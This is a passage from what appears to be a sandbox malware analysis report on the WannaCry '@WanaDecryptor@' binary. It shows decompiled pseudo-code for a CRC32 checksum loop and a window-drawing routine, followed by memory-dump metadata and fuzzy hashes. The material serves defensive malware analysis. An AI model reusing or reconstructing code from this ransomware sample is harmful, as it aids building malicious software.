(_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4);
							_t76 = _t76 + 8;
							_t115 = _t115 - 1;
						} while (_t115 != 0);
					}
					if(_t118 != 0) {
						do {
							_t29 = _t29 >> 0x00000008 ^  *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4);
							_t76 = _t76 + 1;
							_t118 = _t118 - 1;
						} while (_t118 != 0);
					}
					return  !_t29;
				} else {
					return 0;
				}
			}







                                                      0x0040ff90
                                                      0x0040ff96
                                                      0x0040ffa1
                                                      0x0040ffa8
                                                      0x0040ffaa
                                                      0x0040ffb3
                                                      0x0040ffb6
                                                      0x0040ffd0
                                                      0x00410093
                                                      0x00410095
                                                      0x00410096
                                                      0x00410096
                                                      0x0041009d
                                                      0x004100a0
                                                      0x004100a2
                                                      0x004100ba
                                                      0x004100bc
                                                      0x004100bd
                                                      0x004100bd
                                                      0x004100a2
                                                      0x004100c4
                                                      0x0040ff98
                                                      0x0040ff9a
                                                      0x0040ff9a

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                                      • Instruction ID: cecdefe8fda50f928b4117980ad8d25e533be349777a256c316ace181cfd3b57
                                                      • Opcode Fuzzy Hash: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                                      • Instruction Fuzzy Hash: 1E31A6627A959207D350CEBEAC90277BB93D7DB306B6CC678D584C7A0EC579D8078244
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
